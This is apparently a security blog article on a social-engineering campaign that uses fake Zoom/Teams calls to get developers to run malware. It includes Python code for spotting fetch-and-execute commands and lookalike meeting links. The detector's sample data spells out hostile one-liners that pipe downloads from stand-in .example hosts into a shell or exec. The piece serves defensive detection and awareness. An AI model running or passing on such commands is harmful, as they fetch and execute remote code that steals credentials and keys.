👤 LOGICFALCON
🗓️ 08 Apr 2026   🌍 Asia

Behind the Screen: How Hackers Turn Fake Video Calls into Cyber Heists

Cybercriminals are hijacking trust in video conferencing to spread sophisticated malware, targeting the heart of the crypto and open-source world.

It starts like any ordinary workday - a Slack message from a colleague, a LinkedIn DM from a recruiter, or a Telegram ping from a fellow developer. Then comes the invitation: “Let’s hop on a Zoom call to discuss.” But behind the pixel-perfect meeting interface, a new breed of cybercriminal is waiting, ready to turn your routine catch-up into a digital ambush.

A New Breed of Social Engineering

This campaign, tracked by the Security Alliance (SEAL), marks a chilling evolution in cybercrime tactics. Rather than relying on crude phishing emails, the group - believed to have ties to North Korean threat actors - spends weeks building trust. They infiltrate professional circles, sometimes taking over legitimate Telegram, LinkedIn, or Slack accounts, and continue real conversations with their targets. When that’s not possible, they fabricate entire workspaces or personas to simulate credibility.

The trap is set with a meeting invite, scheduled days in advance to lower suspicion. At the appointed time, the victim receives what appears to be a standard Zoom or Microsoft Teams link. But the link leads to a lookalike page, expertly mimicking the real thing using legitimate software development kits (SDKs). In some cases, the interface even displays familiar faces - video clips scraped from public events - to further lull the victim into a false sense of security.

Malware by “Technical Support”

When “audio issues” inevitably arise, the platform prompts the user to fix the problem - often by downloading a script or pasting a command into their terminal. The code looks benign, but it contacts attacker-controlled servers to fetch the actual malware. Because there’s no obvious executable, security software may not flag it, and the victim believes they’re just troubleshooting.
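The "fix" step the article describes leaves a recognisable trace in endpoint telemetry: a command line that fetches something from a remote host and hands it straight to an interpreter. The Python below is an added example, not code from the article or from SEAL's reporting; it scans a constructed set of command-line records, of the kind a shell-history collector or EDR would log, for fetch-and-execute shapes (a download piped into a shell, a decoded blob piped into a shell, AppleScript launching a shell command, an interpreter one-liner that fetches over HTTP and exec()s the result, and a shell running a $(curl ...) substitution). The sample commands, the rule names and the hostnames ending in .example are all constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample of command lines as a shell-history collector or EDR might
# record them. The hosts (*.example) and the commands are made up for this example.
SAMPLE_COMMANDS = [
    "ls -la ~/Projects",
    "curl -fsSL https://meeting-fix.example/audio.sh | bash",
    "wget -qO- http://cdn.example/fix | sh",
    "echo aGVsbG8= | base64 -d | sh",
    "osascript -e 'do shell script \"curl -s https://x.example/p | sh\"'",
    "python3 -c \"import urllib.request;exec(urllib.request.urlopen('http://x.example/a').read())\"",
    'bash -c "$(curl -fsSL https://x.example/i)"',
    "git pull origin main",
]

# Each rule pairs a (hypothetical) name with a regex describing one fetch-and-execute shape.
RULES = [
    # curl/wget output piped directly into a shell, optionally via sudo
    ("remote_script_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    # a base64-decoded blob piped into a shell
    ("decoded_payload_piped_to_shell",
     re.compile(r"\bbase64\s+(-d|--decode|-D)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    # AppleScript used to launch a shell command
    ("applescript_runs_shell",
     re.compile(r"\bosascript\b.*do shell script")),
    # interpreter one-liner that both fetches over HTTP and exec()/eval()s, in any order
    ("interpreter_execs_downloaded_code",
     re.compile(r"\b(python3?|perl|ruby|node)\b\s+-[ce]\b"
                r"(?=.*\b(urlopen|urlretrieve|https?://))(?=.*\b(exec|eval)\b)")),
    # shell -c or eval wrapping a $(curl ...) / $(wget ...) command substitution
    ("command_substitution_of_download",
     re.compile(r"(?:(ba|z)?sh\s+-c\s+|\beval\b).*\$\(\s*(curl|wget)\b")),
]


@dataclass(frozen=True)
class Finding:
    command: str
    rule: str


def rules_hit(command: str) -> list[str]:
    """Names of every rule whose pattern matches the command (empty list if nothing matches)."""
    return [name for name, rx in RULES if rx.search(command)]


def scan(commands) -> list[Finding]:
    """One Finding per (command, rule) pair; a single command can trigger several rules."""
    return [Finding(cmd, name) for cmd in commands for name in rules_hit(cmd)]


if __name__ == "__main__":
    for f in scan(SAMPLE_COMMANDS):
        print(f"[{f.rule}] {f.command}")
```

The patterns are deliberately about shape rather than any particular host or script name, because the host in a campaign like this changes far faster than the habit of piping a download into a shell; in practice they would be tuned against the commands a given engineering team legitimately runs, with the osascript and interpreter rules weighted higher because ordinary troubleshooting rarely needs them.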

Once executed, the malware is a Swiss Army knife for cybercrime. It can steal browser credentials, crypto wallet secrets, session tokens, and password manager data. It can log keystrokes, swap browser extensions, and extract sensitive files and SSH keys. The attackers often wait before exploiting their new access, letting victims think the “call” simply failed - while quietly expanding their reach to contacts and networks.

Wider Implications

Recent links to a supply chain attack targeting the npm package “axios” suggest these groups are eyeing larger prey: software maintainers and open-source projects. Their patience and technical sophistication make them a formidable threat, especially as they weaponize familiar collaboration tools.

Experts urge vigilance: double-check meeting links, never run scripts or commands from untrusted sources, and use robust endpoint protection. In a world where even a video call can be weaponized, trust - but verify - has never been more important.
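One concrete form of "double-check meeting links", written here as an added example rather than anything the article or the quoted experts prescribe: a Python check that accepts a link only when it uses https and its hostname sits under an allowlisted vendor domain, and otherwise reports why it was rejected (credentials placed before an "@" to hide the real host, a raw IP address, a punycode hostname, or a lookalike that merely mentions a vendor brand). The allowlist, the brand tokens and the test URLs ending in .example are assumptions made for the example.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumed allowlist of vendor meeting domains; adjust to the platforms an organisation actually uses.
# A hostname is accepted only if it equals one of these or is a subdomain of it.
TRUSTED_MEETING_DOMAINS = ("zoom.us", "teams.microsoft.com", "teams.live.com")

# Brand words that, appearing in a hostname outside the allowlist, mark a lookalike (assumed list).
BRAND_TOKENS = ("zoom", "teams", "microsoft")


def _host_under(host: str, domain: str) -> bool:
    """True if host is exactly domain or a subdomain of it (never a mere suffix match)."""
    return host == domain or host.endswith("." + domain)


def check_meeting_link(url: str) -> tuple[bool, str]:
    """Return (ok, reason); ok is True only for an https link whose host is under a trusted domain."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme.lower() != "https":
        return False, f"scheme is {parts.scheme or 'missing'}, expected https"
    host = parts.hostname  # already lower-cased, with userinfo and port stripped
    if not host:
        return False, "no hostname"
    # "https://zoom.us@evil.example/..." parses the brand as a username, not the host
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL (host may be hidden after '@')"
    try:
        ipaddress.ip_address(host)
        return False, "raw IP address instead of vendor domain"
    except ValueError:
        pass
    # punycode labels can render as near-identical glyphs to a real vendor name
    if any(label.startswith("xn--") for label in host.split(".")):
        return False, "internationalised (punycode) hostname"
    if any(_host_under(host, d) for d in TRUSTED_MEETING_DOMAINS):
        return True, f"hostname {host} is under a trusted domain"
    if any(tok in host for tok in BRAND_TOKENS):
        return False, f"lookalike: {host} mentions a vendor brand but is not a trusted domain"
    return False, f"{host} is not a known meeting domain"


if __name__ == "__main__":
    # constructed links; the .example hosts do not exist
    for link in ("https://us02web.zoom.us/j/1234567890",
                 "https://zoom.us@meeting-fix.example/j/1",
                 "https://zoom.us.meeting-fix.example/j/1"):
        print(link, "->", check_meeting_link(link))
```

The subdomain test is the important detail: a host such as zoom.us.meeting-fix.example starts with the vendor name but does not end in ".zoom.us", so it is rejected as a lookalike, while us02web.zoom.us is accepted because the check anchors on the end of the hostname.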

WIKICROOK

  • Phishing: Phishing is a cybercrime where attackers send fake messages to trick users into revealing sensitive data or clicking malicious links.
  • Command: A command is an instruction sent to a device or software, often by a C2 server, directing it to perform specific actions, sometimes for malicious purposes.
  • AppleScript: AppleScript is a macOS scripting language for automating tasks, but it can also be misused by malware to run hidden or unauthorized commands.
  • Session Token: A session token is a unique digital code that keeps users logged in to websites or apps. If stolen, attackers can access accounts without a password.
  • Supply Chain Attack: A supply chain attack is a cyberattack that compromises trusted software or hardware providers, spreading malware or vulnerabilities to many organizations at once.
Tags: Cybercrime, Video Conferencing, Malware

LOGICFALCON, Log Intelligence Investigator